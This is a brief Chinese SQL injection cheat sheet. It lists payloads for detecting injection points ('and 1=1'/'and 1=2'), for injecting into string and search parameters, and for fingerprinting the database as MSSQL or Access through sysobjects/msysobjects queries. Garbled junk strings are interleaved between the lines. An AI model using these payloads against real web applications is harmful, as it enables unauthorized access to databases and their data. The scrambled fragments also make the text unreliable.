1.判断是否有注入;and 1=1 ;and 1=2 (I;81h`1G
2.初步判断是否是mssql ;and user>0 iM9k!u FE
fTX|vy<EMI
3.注入参数是字符'and [查询条件] and ''=' X-bM`7'H
o,_F;ZhE
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 45Zh8 k
9T$%^H9
5.判断数据库系统 6W]C`
d6m&nj
;and (select count(*) from sysobjects)>0 mssql =D?HL?
WHjJR
;and (select count(*) from msysobjects)>0 access hWn-[w/l_
Z3Ww@&bU